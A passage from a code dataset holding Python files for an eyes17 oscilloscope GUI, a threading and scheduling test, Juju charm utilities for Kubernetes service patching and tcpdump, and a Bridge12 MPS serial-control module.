val\n\t\t\tself.PV1text.setText(unicode(val))\n\t\t\ttry:\n\t\t\t\tself.p.set_pv1(val)\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\n\tdef pv2_text(self, text):\n\t\ttry:\n\t\t\tval = float(text)\n\t\texcept:\n\t\t\treturn\n\t\tval = float(text)\n\t\tif self.PV2min <= val <= self.PV2max:\n\t\t\tself.PV2val = val\n\t\t\ttry:\n\t\t\t\tself.p.set_pv2(val)\n\t\t\t\tself.PV2slider.setValue(int(val*1000))\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\t\t\t\t\n\tdef pv2_slider(self, pos):\n\t\tval = float(pos)/1000.0\n\t\tif self.PV2min <= val <= self.PV2max:\n\t\t\tself.PV2val = val\n\t\t\tself.PV2text.setText(unicode(val))\n\t\t\ttry:\n\t\t\t\tself.p.set_pv2(val)\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\t\t\t\t\n\tdef sq1_dc(self, text):\n\t\ttry:\n\t\t\tval = float(text)\n\t\texcept:\n\t\t\treturn\n\t\tif 1 <= val <= 99:\n\t\t\tself.dutyCycle = val\n\t\t\ts = self.SQ1text.text()\n\t\t\tself.sq1_text(s)\n\n\tdef sq1_text(self, text):\n\t\ttry:\n\t\t\tval = float(text)\n\t\texcept:\n\t\t\treturn\n\t\tif self.SQ1min <= val <= self.SQ1max:\n\t\t\tself.SQ1val = val\n\t\t\tself.SQ1slider.setValue(self.SQ1val)\n\t\t\ttry:\n\t\t\t\tif 0 <= val < 4 : val = 0\n\t\t\t\tres = self.p.set_sqr1(val, self.dutyCycle)\n\t\t\t\tss = '%5.1f'%res\n\t\t\t\tself.msg(self.tr('sqr1 set to ') + ss)\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\n\tdef sq1_slider(self, val):\n\t\tif self.SQ1min <= val <= self.SQ1max:\n\t\t\tself.SQ1val = val\n\t\t\tself.SQ1text.setText(unicode(val))\n\t\t\ts = self.SQ1text.text()\n\t\t\tself.sq1_text(s)\n\t\t\t\t\n\tdef select_wgain(self,index):\n\t\tself.Wgain.setText(self.Wgains[index])\n\t\tself.wgainindex = index\n\t\ttry:\n\t\t\tself.p.set_sine_amp(index)\n\t\texcept:\n\t\t\tself.comerr()\n\n\tdef set_wave(self):\n\t\ttry:\n\t\t\tif self.waveindex <= 1:\n\t\t\t\tres = self.p.set_wave(self.AWGval, self.Waves[self.waveindex])\n\t\t\t\tss = '%6.2f'%res\n\t\t\t\tself.msg(self.tr('AWG set to ') + ss + self.tr(' Hz'))\n\t\t\telse:\n\t\t\t\tself.p.set_sqr2(self.AWGval)\n\t\t\t\tself.msg(self.tr('Output Changed from WG to SQ2'))\n\t\texcept:\n\t\t\tself.comerr()\n\n\tdef select_wave(self,index):\n\t\tself.Wshape.setText(self.Waves[index])\n\t\tself.waveindex = index\n\t\tself.set_wave()\n\n\tdef awg_text(self, text):\n\t\ttry:\n\t\t\tval = float(text)\n\t\t\tif self.AWGmin <= val <= self.AWGmax:\n\t\t\t\tself.AWGval = val\n\t\t\t\tself.AWGslider.setValue(self.AWGval)\n\t\t\t\tself.set_wave()\n\t\texcept:\n\t\t\treturn\n\n\tdef awg_slider(self, val):\n\t\tif self.AWGmin <= val <= self.AWGmax:\n\t\t\tself.AWGval = val\n\t\t\tself.AWGtext.setText(unicode(val))\n\t\t\tself.set_wave()\n\n\tdef control_od1(self):\n\t\ttry:\n\t\t\tstate = self.OD1.isChecked()\n\t\t\tif state == True:\n\t\t\t\tself.p.set_state(OD1=1)\n\t\t\telse:\n\t\t\t\tself.p.set_state(OD1=0) \n\t\texcept:\n\t\t\tself.comerr()\n \n\tdef control_ccs(self):\n\t\ttry:\n\t\t\tstate = self.CCS.isChecked()\n\t\t\tif state == True:\n\t\t\t\tself.p.set_state(CCS=1)\n\t\t\telse:\n\t\t\t\tself.p.set_state(CCS=0) \n\t\texcept:\n\t\t\tself.comerr()\n\t\t\t\n\tdef measure_cap(self):\n\t\ttry:\n\t\t\tcap = self.p.get_capacitance()\n\t\t\tif cap == None:\n\t\t\t\tself.msg(self.tr('Capacitance too high or short to ground'))\n\t\t\telse:\n\t\t\t\tif cap < 1.0e-9:\n\t\t\t\t\tss = '%6.1f'%(cap*1e12)\n\t\t\t\t\tself.CAP.setText(''+ ss +self.tr(' pF'))\n\t\t\t\telif cap < 1.0e-6:\n\t\t\t\t\tss = '%6.1f'%(cap*1e9)\n\t\t\t\t\tself.CAP.setText(''+ ss +self.tr(' nF'))\n\t\t\t\telif cap < 1.0e-3:\n\t\t\t\t\tss = '%6.1f'%(cap*1e6)\n\t\t\t\t\tself.CAP.setText(''+ ss +self.tr(' uF'))\n\t\texcept:\n\t\t\tself.comerr()\n\n\tdef measure_freq(self):\n\t\ttry:\n\t\t\tfr = self.p.get_freq()\n\t\t\thi = self.p.r2ftime('IN2','IN2')\n\t\texcept:\n\t\t\tself.comerr()\n\t\tif fr > 0:\t\n\t\t\tT = 1./fr\n\t\t\tdc = hi*100/T\n\t\t\tself.IN2.setText(u''+unicode(self.tr('%5.1fHz %4.1f%%')) %(fr,dc))\n\t\telse:\n\t\t\tself.IN2.setText(u''+self.tr('No signal'))\n\t\t\n\tdef msg(self, m):\n\t\tself.msgwin.setText(self.tr(m))\n\t\t\n\tdef comerr(self):\n\t\tself.msgwin.setText('' + self.tr('Error. Try Device->Reconnect'))\n\nif __name__ == '__main__':\n\timport eyes17.eyes\n\tdev = eyes17.eyes.open()\n\tapp = QApplication(sys.argv)\n\n\t# translation stuff\n\tlang=QLocale.system().name()\n\tt=QTranslator()\n\tt.load(\"lang/\"+lang, os.path.dirname(__file__))\n\tapp.installTranslator(t)\n\tt1=QTranslator()\n\tt1.load(\"qt_\"+lang,\n\t\tQLibraryInfo.location(QLibraryInfo.TranslationsPath))\n\tapp.installTranslator(t1)\n\n\tmw = Expt(dev)\n\tmw.show()\n\tsys.exit(app.exec_())\n\t\n", "sub_path": "expRVCEdeb/usr/share/eyes17/scope.py", "file_name": "scope.py", "file_ext": "py", "file_size_in_byte": 24382, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pyqtgraph.TextItem", "line_number": 129, "usage_type": "call"}, {"api_name": "pyqtgraph.TextItem", "line_number": 139, "usage_type": "call"}, {"api_name": "utils.makeResultColors", "line_number": 150, "usage_type": "call"}, {"api_name": "utils.makeTraceColors", "line_number": 151, "usage_type": "call"}, {"api_name": "utils.makeHtmlColors", "line_number": 152, "usage_type": "call"}, {"api_name": "utils.sliderVert", "line_number": 159, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 161, "usage_type": "call"}, {"api_name": "pyqtgraph.GraphicsWindow", "line_number": 165, "usage_type": "call"}, {"api_name": "pyqtgraph.SignalProxy", "line_number": 167, "usage_type": "call"}, {"api_name": "pyqtgraph.TextItem", "line_number": 172, "usage_type": "call"}, {"api_name": "pyqtgraph.TextItem", "line_number": 175, "usage_type": "call"}, {"api_name": "pyqtgraph.InfiniteLine", "line_number": 178, "usage_type": "call"}, {"api_name": "pyqtgraph.InfiniteLine", "line_number": 182, "usage_type": "call"}, {"api_name": "utils.slider", "line_number": 280, "usage_type": "call"}, {"api_name": "utils.lineEdit", "line_number": 282, "usage_type": "call"}, {"api_name": "utils.slider", "line_number": 295, "usage_type": "call"}, {"api_name": "utils.lineEdit", "line_number": 297, "usage_type": "call"}, {"api_name": "utils.lineEdit", "line_number": 302, "usage_type": "call"}, {"api_name": "utils.slider", "line_number": 314, "usage_type": "call"}, {"api_name": "utils.lineEdit", "line_number": 317, "usage_type": "call"}, {"api_name": "utils.slider", "line_number": 330, "usage_type": "call"}, {"api_name": "utils.lineEdit", "line_number": 333, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 349, "usage_type": "call"}, {"api_name": "utils.slider", "line_number": 380, "usage_type": "call"}, {"api_name": "utils.slider", "line_number": 391, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 477, "usage_type": "call"}, {"api_name": "eyes17.eyemath17.fit_sine", "line_number": 482, "usage_type": "call"}, {"api_name": "eyes17.eyemath17", "line_number": 482, "usage_type": "name"}, {"api_name": "eyes17.eyemath17.pi", "line_number": 490, "usage_type": "attribute"}, {"api_name": "eyes17.eyemath17", "line_number": 490, "usage_type": "name"}, {"api_name": "numpy.Inf", "line_number": 514, "usage_type": "attribute"}, {"api_name": "pyqtgraph.TextItem", "line_number": 534, "usage_type": "call"}, {"api_name": "eyes17.eyemath17.fit_sine", "line_number": 573, "usage_type": "call"}, {"api_name": "eyes17.eyemath17", "line_number": 573, "usage_type": "name"}, {"api_name": "eyes17.eyemath17.fft", "line_number": 585, "usage_type": "call"}, {"api_name": "eyes17.eyemath17", "line_number": 585, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 588, "usage_type": "call"}, {"api_name": "pyqtgraph.plot", "line_number": 589, "usage_type": "call"}, {"api_name": "pyqtgraph.TextItem", "line_number": 591, "usage_type": "call"}, {"api_name": "eyes17.eyemath17.eyes.open", "line_number": 835, "usage_type": "call"}, {"api_name": "eyes17.eyemath17.eyes", "line_number": 835, "usage_type": "attribute"}, {"api_name": "eyes17.eyemath17", "line_number": 835, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 836, "usage_type": "attribute"}, {"api_name": "os.path.path.dirname", "line_number": 841, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 841, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 841, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 850, "usage_type": "call"}]} +{"seq_id": "380034795", "text": "import time\nimport schedule\nimport threading\n\nactividad = False\n\n\ndef verde():\n\tpinRojo = 3 ## Pin del led rojo\n\tpinVerde = 2 ## Pin del led verde\n \n\tdigitalWrite(pinrojo,0) # Apagamos el led rojo\n\n\tdigitalWrite(pinVerde,1) # Encendemos el led verde\n\n\ndef rojo():\n\tpinRojo = 3 ## Pin del led rojo\n\tpinVerde = 2 ## Pin del led verde\n\n\tdigitalWrite(pinVerde,0) # Apagamos el led verde\n\tdigitalWrite(pinrojo,1) # Encendemos el led rojo\n\n\n\ndef MyThread1():\n\n\tglobal actividad\n\n\twhile True:\n\t\t\n\t\tif actividad:\n\t\t\tverde()\n\t\telse:\n\t\t\trojo()\n\t\t\n\t\tactividad = not actividad\n\ndef despertador():\n\tprint ('Activamos despertador')\n\ncontador = 0\nperiodo = 5\nglobal actividad\n\nt1 = threading.Thread(target=MyThread1, args=[])\nt1.start()\n\nschedule.every().day.at(\"16:41\").do(despertador)\n\nwhile True:\n\n\tstart = time.time()\n\n\tif contador % 1 == 0:\n\n\t\tschedule.run_pending()\n\t\tprint ('Tarea 1')\n\t\n\tif contador % 2 == 0:\n\t\tprint ('Tarea 2')\n\n\tif contador % 3 == 0:\n\t\tprint ('Tarea 3')\n\n\tcontador = contador + 1\n\n\tprint (actividad)\n\n\tif contador == 30:\n\t\tcontador =0\n\n\n\tend = time.time()\n\ttime_elapsed = end - start\n\ttime.sleep(periodo-time_elapsed)\n\n\n\n", "sub_path": "test_ciclico.py", "file_name": "test_ciclico.py", "file_ext": "py", "file_size_in_byte": 1169, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "threading.Thread", "line_number": 46, "usage_type": "call"}, {"api_name": "schedule.every", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}, {"api_name": "schedule.run_pending", "line_number": 57, "usage_type": "call"}, {"api_name": "time.time", "line_number": 74, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "641710764", "text": "# Copyright 2021 Canonical Ltd.\n# See LICENSE file for licensing details.\n\nimport logging\nimport os\nimport time\nfrom typing import List, Set, Tuple, Optional\n\nimport kubernetes\nfrom ops.charm import CharmBase\nfrom ops.model import MaintenanceStatus\nfrom ops.pebble import ConnectionError\nfrom ops.framework import StoredState\nfrom ipaddress import IPv4Address\nimport subprocess\n\n\nclass PatchFailed(RuntimeError):\n \"\"\"Patching the kubernetes service failed.\"\"\"\n\n\nclass K8sServicePatch:\n \"\"\"A utility for patching the Kubernetes service set up by Juju.\n Attributes:\n namespace_file (str): path to the k8s namespace file in the charm container\n \"\"\"\n\n namespace_file = \"/var/run/secrets/kubernetes.io/serviceaccount/namespace\"\n\n @staticmethod\n def namespace() -> str:\n \"\"\"Read the Kubernetes namespace we're deployed in from the mounted service token.\n Returns:\n str: The current Kubernetes namespace\n \"\"\"\n with open(K8sServicePatch.namespace_file, \"r\") as f:\n return f.read().strip()\n\n @staticmethod\n def _k8s_service(\n app: str, service_ports: List[Tuple[str, int, int, str]]\n ) -> kubernetes.client.V1Service:\n \"\"\"Property accessor to return a valid Kubernetes Service representation for Alertmanager.\n Args:\n app: app name\n service_ports: a list of tuples (name, port, target_port) for every service port.\n Returns:\n kubernetes.client.V1Service: A Kubernetes Service with correctly annotated metadata and\n ports.\n \"\"\"\n ports = [\n kubernetes.client.V1ServicePort(\n name=port[0], port=port[1], target_port=port[2], protocol=port[3]\n )\n for port in service_ports\n ]\n\n ns = K8sServicePatch.namespace()\n return kubernetes.client.V1Service(\n api_version=\"v1\",\n metadata=kubernetes.client.V1ObjectMeta(\n namespace=ns,\n name=app,\n labels={\"app.kubernetes.io/name\": app},\n ),\n spec=kubernetes.client.V1ServiceSpec(\n ports=ports,\n selector={\"app.kubernetes.io/name\": app},\n ),\n )\n\n @staticmethod\n def set_ports(app: str, service_ports: List[Tuple[str, int, int, str]]):\n \"\"\"Patch the Kubernetes service created by Juju to map the correct port.\n Currently, Juju uses port 65535 for all endpoints. This can be observed via:\n kubectl describe services -n | grep Port -C 2\n At runtime, pebble watches which ports are bound and we need to patch the gap for pebble\n not telling Juju to fix the K8S Service definition.\n Typical usage example from within charm code (e.g. on_install):\n service_ports = [(\"my-app-api\", 9093, 9093), (\"my-app-ha\", 9094, 9094)]\n K8sServicePatch.set_ports(self.app.name, service_ports)\n Args:\n app: app name\n service_ports: a list of tuples (name, port, target_port) for every service port.\n Raises:\n PatchFailed: if patching fails.\n \"\"\"\n # First ensure we're authenticated with the Kubernetes API\n\n ns = K8sServicePatch.namespace()\n # Set up a Kubernetes client\n api = kubernetes.client.CoreV1Api(kubernetes.client.ApiClient())\n try:\n # Delete the existing service so we can redefine with correct ports\n # I don't think you can issue a patch that *replaces* the existing ports,\n # only append\n api.delete_namespaced_service(name=app, namespace=ns)\n # Recreate the service with the correct ports for the application\n api.create_namespaced_service(\n namespace=ns, body=K8sServicePatch._k8s_service(app, service_ports)\n )\n except kubernetes.client.exceptions.ApiException as e:\n raise PatchFailed(\"Failed to patch k8s service: {}\".format(e))\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass OaiCharm(CharmBase):\n \"\"\"Oai Base Charm.\"\"\"\n\n _stored = StoredState()\n\n def __init__(\n self,\n *args,\n tcpdump: bool = False,\n ports=None,\n privileged: bool = False,\n container_name=None,\n service_name,\n ):\n super().__init__(*args)\n\n self.ports = ports\n self.privileged = privileged\n self.container_name = container_name\n self.service_name = service_name\n\n event_mapping = {\n self.on.install: self._on_install,\n }\n if tcpdump:\n event_mapping[self.on.tcpdump_pebble_ready] = self._on_tcpdump_pebble_ready\n for event, observer in event_mapping.items():\n self.framework.observe(event, observer)\n\n self._stored.set_default(\n _k8s_stateful_patched=False,\n _k8s_authed=False,\n )\n\n def _on_install(self, _=None):\n if not self._stored._k8s_authed:\n kubernetes.config.load_incluster_config()\n self._stored._k8s_authed = True\n if not self._stored._k8s_authed:\n kubernetes.config.load_incluster_config()\n self._stored._k8s_authed = True\n if self.privileged:\n self._patch_stateful_set()\n K8sServicePatch.set_ports(self.app.name, self.ports)\n\n def _on_tcpdump_pebble_ready(self, event):\n self.update_tcpdump_service(event)\n\n def update_tcpdump_service(self, event):\n try:\n self._configure_tcpdump_service()\n if (\n self.config[\"start-tcpdump\"]\n and self.service_exists(\"tcpdump\", \"tcpdump\")\n and not self.is_service_running(\"tcpdump\", \"tcpdump\")\n ):\n self.start_service(\"tcpdump\", \"tcpdump\")\n elif (\n not self.config[\"start-tcpdump\"]\n and self.service_exists(\"tcpdump\", \"tcpdump\")\n and self.is_service_running(\"tcpdump\", \"tcpdump\")\n ):\n self.stop_service(\"tcpdump\", \"tcpdump\")\n except ConnectionError:\n logger.info(\"pebble socket not available, deferring config-changed\")\n event.defer()\n\n def _configure_tcpdump_service(self):\n container = self.unit.get_container(\"tcpdump\")\n container.add_layer(\n \"tcpdump\",\n {\n \"summary\": \"tcpdump layer\",\n \"description\": \"pebble config layer for tcpdump\",\n \"services\": {\n \"tcpdump\": {\n \"override\": \"replace\",\n \"summary\": \"tcpdump\",\n \"command\": f\"/usr/sbin/tcpdump -i any -w /pcap_{self.app.name}.pcap\",\n \"environment\": {\n \"DEBIAN_FRONTEND\": \"noninteractive\",\n \"TZ\": \"Europe/Paris\",\n },\n }\n },\n },\n combine=True,\n )\n\n def start_service(self, container_name=None, service_name=None):\n if not container_name:\n container_name = self.container_name\n if not service_name:\n service_name = self.service_name\n container = self.unit.get_container(container_name)\n logger.info(f\"{container.get_plan()}\")\n container.start(service_name)\n\n def stop_service(self, container_name=None, service_name=None):\n if not container_name:\n container_name = self.container_name\n if not service_name:\n service_name = self.service_name\n container = self.unit.get_container(container_name)\n container.stop(service_name)\n\n def is_service_running(self, container_name=None, service_name=None):\n if not container_name:\n container_name = self.container_name\n if not service_name:\n service_name = self.service_name\n container = self.unit.get_container(container_name)\n is_running = (\n service_name in container.get_plan().services\n and container.get_service(service_name).is_running()\n )\n logger.info(f\"container {self.container_name} is running: {is_running}\")\n return is_running\n\n def service_exists(self, container_name=None, service_name=None):\n if not container_name:\n container_name = self.container_name\n if not service_name:\n service_name = self.service_name\n container = self.unit.get_container(container_name)\n service_exists = service_name in container.get_plan().services\n logger.info(f\"service {service_name} exists: {service_exists}\")\n return service_exists\n\n def _patch_stateful_set(self) -> None:\n \"\"\"Patch the StatefulSet to include specific ServiceAccount and Secret mounts\"\"\"\n if self._stored._k8s_stateful_patched:\n return\n\n # Get an API client\n api = kubernetes.client.AppsV1Api(kubernetes.client.ApiClient())\n for attempt in range(5):\n try:\n self.unit.status = MaintenanceStatus(\n f\"patching StatefulSet for additional k8s permissions. Attempt {attempt+1}/5\"\n )\n s = api.read_namespaced_stateful_set(\n name=self.app.name, namespace=self.namespace\n )\n # Add the required security context to the container spec\n s.spec.template.spec.containers[1].security_context.privileged = True\n\n # Patch the StatefulSet with our modified object\n api.patch_namespaced_stateful_set(\n name=self.app.name, namespace=self.namespace, body=s\n )\n logger.info(\n \"Patched StatefulSet to include additional volumes and mounts\"\n )\n self._stored._k8s_stateful_patched = True\n return\n except Exception as e:\n self.unit.status = MaintenanceStatus(\n \"failed patching StatefulSet... Retrying in 10 seconds\"\n )\n time.sleep(5)\n\n @property\n def namespace(self) -> str:\n with open(\"/var/run/secrets/kubernetes.io/serviceaccount/namespace\", \"r\") as f:\n return f.read().strip()\n\n @property\n def pod_ip(self) -> Optional[IPv4Address]:\n return IPv4Address(\n subprocess.check_output([\"unit-get\", \"private-address\"]).decode().strip()\n )\n\n def search_logs(\n self, logs: Set[str] = {}, subsets_in_line: Set[str] = {}, wait: bool = False\n ) -> bool:\n \"\"\"\n Search list of logs in the container and service\n\n :param: logs: List of logs to be found\n :param: wait: Bool to wait until those logs are found\n \"\"\"\n if logs and subsets_in_line:\n raise Exception(\"logs and subsets_in_line cannot both be defined\")\n elif not logs and not subsets_in_line:\n raise Exception(\"logs or subsets_in_line must be defined\")\n\n found_logs = set()\n os.environ[\n \"PEBBLE_SOCKET\"\n ] = f\"/charm/containers/{self.container_name}/pebble.socket\"\n p = subprocess.Popen(\n f'/charm/bin/pebble logs {self.service_name} {\"-f\" if wait else \"\"} -n all',\n stdout=subprocess.PIPE,\n shell=True,\n encoding=\"utf-8\",\n )\n all_logs_found = False\n for line in p.stdout:\n if logs:\n for log in logs:\n if log in line:\n found_logs.add(log)\n logger.info(f\"{log} log found\")\n break\n\n if all(log in found_logs for log in logs):\n all_logs_found = True\n logger.info(\"all logs found\")\n break\n else:\n if all(subset in line for subset in subsets_in_line):\n all_logs_found = True\n logger.info(\"subset of strings found\")\n break\n p.kill()\n return all_logs_found\n", "sub_path": "oai-amf-operator/src/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 12180, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 41, "usage_type": "name"}, {"api_name": "kubernetes.client.V1ServicePort", "line_number": 52, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 52, "usage_type": "attribute"}, {"api_name": "kubernetes.client.V1Service", "line_number": 59, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 59, "usage_type": "attribute"}, {"api_name": "kubernetes.client.V1ObjectMeta", "line_number": 61, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 61, "usage_type": "attribute"}, {"api_name": "kubernetes.client.V1ServiceSpec", "line_number": 66, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 66, "usage_type": "attribute"}, {"api_name": "kubernetes.client", "line_number": 42, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 73, "usage_type": "name"}, {"api_name": "kubernetes.client.CoreV1Api", "line_number": 92, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 92, "usage_type": "attribute"}, {"api_name": "kubernetes.client.ApiClient", "line_number": 92, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 102, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 106, "usage_type": "call"}, {"api_name": "ops.charm.CharmBase", "line_number": 109, "usage_type": "name"}, {"api_name": "ops.framework.StoredState", "line_number": 112, "usage_type": "call"}, {"api_name": "kubernetes.config.load_incluster_config", "line_number": 145, "usage_type": "call"}, {"api_name": "kubernetes.config", "line_number": 145, "usage_type": "attribute"}, {"api_name": "kubernetes.config.load_incluster_config", "line_number": 148, "usage_type": "call"}, {"api_name": "kubernetes.config", "line_number": 148, "usage_type": "attribute"}, {"api_name": "ops.pebble.ConnectionError", "line_number": 172, "usage_type": "name"}, {"api_name": "kubernetes.client.AppsV1Api", "line_number": 244, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 244, "usage_type": "attribute"}, {"api_name": "kubernetes.client.ApiClient", "line_number": 244, "usage_type": "call"}, {"api_name": "ops.model.MaintenanceStatus", "line_number": 247, "usage_type": "call"}, {"api_name": "ops.model.MaintenanceStatus", "line_number": 266, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 269, "usage_type": "call"}, {"api_name": "ipaddress.IPv4Address", "line_number": 278, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 279, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 277, "usage_type": "name"}, {"api_name": "ipaddress.IPv4Address", "line_number": 277, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 283, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 297, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 300, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 302, "usage_type": "attribute"}]} +{"seq_id": "572298787", "text": "import numpy as np\nimport socket\nimport time\nimport os\nimport subprocess\nimport sys\nfrom . import serverConfig\nimport serial.tools.list_ports\n\nHOST = serverConfig.HOST\nPORT = serverConfig.PORT\n\ninitializeOnStart = serverConfig.initializeOnStart\ndefaultSerialPort = serverConfig.defaultSerialPort\nserialDelay = serverConfig.serialDelay\n\nautoDetectSerialPort = serverConfig.autoDetectSerialPort\nsystemReadyString = serverConfig.systemReadyString\n\n\npath = os.path.abspath(__file__)\ndir_path = os.path.dirname(path)\n\ndef ampgain(gain = None):\n '''Advanced feature to adjust gain for calibration of MPS\n\n Args:\n gain (None, float, int): Amplifier gain in dBm\n\n Returns:\n float: if gain is None, returns the current amplifier gain value in dBm\n '''\n\n if gain is not None:\n gain = gain * 10\n gainString = str(int(gain))\n send_command('ampgain %s'%gainString)\n\n else:\n gainString = send_command('ampgain?', recv = True)\n gain = float(gainString) / 10.\n\n return gain\n\ndef ampstatus(ampState = None):\n ''' Query MPS microwave amplifier status\n\n +---------+----------------------+\n |ampState |Description |\n +=========+======================+\n |0 |Amplifier Off |\n +---------+----------------------+\n |1 |Amplifier On |\n +---------+----------------------+\n |2 |Amplifier Ext |\n +---------+----------------------+\n\n Returns:\n ampState (int): Amplifier status of MPS\n '''\n\n if ampState is not None:\n if ampState not in (0,1,2):\n raise ValueError('Invalid Amplifier State. Must be 0, 1, 2')\n ampState = int(ampState)\n\n ampStateString = str(ampState)\n send_command('ampstatus %s'%ampStateString)\n else:\n ampStateString = send_command('ampstatus?',recv = True)\n ampState = int(ampStateString)\n return ampState\n\ndef amptemp():\n ''' Query the MPS amplifier temperature\n\n Returns:\n ampTemp (float): Amplifier temperature in degrees C\n '''\n\n ampTempString = send_command('amptemp?',recv = True)\n ampTemp = float(ampTempString) / 10.\n return ampTemp\n\n\ndef close():\n '''Close serial port\n '''\n send_command('_close_')\n\n print('Closing serial socket...')\n\n isMPSReady = systemReady()\n if (isMPSReady == 0):\n print('Serial socket closed')\n else:\n print('Failed to close serial socket')\n\ndef debug(debugMode = None):\n '''Query/Set debug mode of MPS\n\n Args:\n debugMode (None, int): If None, query the debug mode. Otherwise set the debug mode.\n\n Returns:\n debugMode (int): If query, returns current debug mode of MPS\n '''\n\n if debugMode is not None:\n if debugMode in (0,1):\n send_command('debug %i'%debugMode)\n else:\n raise ValueError('Debug mode must be 0 or 1')\n else:\n debugModeString = send_command('debug?', recv = True)\n debugMode = int(debugModeString)\n return debugMode\n\ndef detectMPSSerialPort():\n '''Return the serial port for the MPS\n\n Returns:\n str: MPS serial port. If MPS serial port is not found, uses the default serial port.\n '''\n\n print('Automatically Detecting Serial Port...')\n ports = list(serial.tools.list_ports.comports())\n MPSDetected = False\n for p in ports:\n print(p)\n if (p.vid == 9025 or p.vid == 10755):\n MPSDetected = True\n MPSPort = p.device\n print('MPS Detected on port %s'%(MPSPort))\n if MPSDetected:\n serialPort = MPSPort\n else:\n print('Automatic detection failed.')\n serialPort = None\n return serialPort\n\ndef firmware():\n '''Query the MPS firmware version\n\n Returns:\n firmwareVersion (str): Firmware version\n '''\n firmwareVersion = send_command('firmware?',recv = True)\n return firmwareVersion\n\ndef flush():\n '''Flush the MPS Serial Buffer\n '''\n send_command('_flush_')\n\ndef freq(freqValue = None):\n ''' Set/Query Microwave Frequency\n\n Args:\n freqValue (int, float): Set Frequency in GHz, by default this parameter is None and the frequency is queried\n\n Returns:\n frequency in GHz\n\n Example::\n\n microwaveFrequency = freq() # Query Microwave Frequency\n\n freq(9.4) # Set Microwave Frequency to 9.4 GHz\n\n '''\n max_freq = 100.\n if freqValue is not None:\n if not isinstance(freqValue,(float,int)):\n raise ValueError('Frequency value must be an float or int')\n if (freqValue > max_freq):\n raise ValueError('Frequency value must be in units of GHz')\n freqValue = float(freqValue)\n kHz_freq = freqValue * 1.e6\n str_freq = '%0.0f'%kHz_freq\n \n send_command('freq %s'%str_freq)\n\n else: # Query the frequency\n return_kHz_freq = send_command('freq?',recv = True)\n return_freq = float(return_kHz_freq) / 1.e6 # convert to GHz\n return return_freq\n\ndef id():\n '''Query the instrument identificationstring of MPS\n\n Returns:\n idString (str): ID of instrument: \"Bridge12 MPS\"\n '''\n idString = send_command('id?',recv = True)\n return idString\n\ndef in_waiting():\n '''Return bytes in MPS serial port\n\n Returns:\n value (int): number of bytes at serial port\n '''\n value_string = send_command('_in_waiting_',recv = True)\n value = int(value_string)\n return value\n\ndef listPorts():\n '''List the serial ports available. This function is for troubleshooting when the serial port of the MPS is unknown.\n\n Returns:\n portsAvailable (dict): Dictionary of Serial Ports. Key is serial port. Value is description.\n\n Example::\n\n portsAvailable = listPorts() # Return Dictionary of Serial Ports Available\n '''\n\n portsAvailable = {}\n ports = list(serial.tools.list_ports.comports())\n for p in ports:\n print('*'*50)\n print('serial port: ' + str(p.device))\n print('description: ' + str(p.description))\n portsAvailable[p.device] = p.description\n print('*'*50)\n return portsAvailable\n\ndef lockstatus(lockState = None,verifyOperateMode = True):\n '''Set/Query the frequency lock, must be performed in operate mode\n\n +---------+----------------------+\n |lockState|Description |\n +=========+======================+\n |0 |Disable Frequency Lock|\n +---------+----------------------+\n |1 |Enable Frequency Lock |\n +---------+----------------------+\n\n Args:\n lockState (None, int): if lockState is not None, sets the lock state\n verifyOperateMode (bool): If True, verifies that the operate mode is enabled before setting the lock state\n\n Warning:\n The frequency lock can only be enabled in operate mode (screen() returns 1).\n\n Returns:\n lockState (int): Frequency lock state of MPS\n\n Example::\n\n lockState = lockstatus() # Query the Frequency Lock Status\n\n lockstatus(0) # Diable Frequency Lock\n lockstatus(1) # Enable Frequency Lock\n\n '''\n if lockState is not None:\n if lockState in (0,1):\n if verifyOperateMode:\n #Check for operate mode with \n screenState = screen()\n if screenState != 2:\n raise ValueError('Screen State Must be Operate Mode for Lock Mode')\n rfState = rfstatus()\n if rfState != 1:\n raise ValueError('RF Output Must be enabled for lock Mode')\n send_command('lockstatus %i'%lockState)\n\n else:\n raise ValueError('Lock State Not Valid')\n else:\n lockStateString = send_command('lockstatus?', recv = True)\n lockState = int(lockStateString)\n return lockState\n\n\ndef lockdelay(delay = None):\n '''Set/Query lock delay in ms\n\n Args:\n delay (None, int, float): Frequency lock delay in ms\n\n Returns:\n delayReading (int): 